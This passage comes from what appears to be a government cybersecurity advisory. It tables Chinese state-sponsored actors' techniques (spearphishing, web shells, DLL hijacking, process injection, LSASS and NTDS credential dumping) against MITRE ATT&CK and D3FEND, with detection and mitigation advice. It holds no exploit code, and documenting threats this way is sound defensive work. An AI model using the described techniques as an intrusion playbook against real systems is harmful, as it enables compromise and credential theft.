Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis 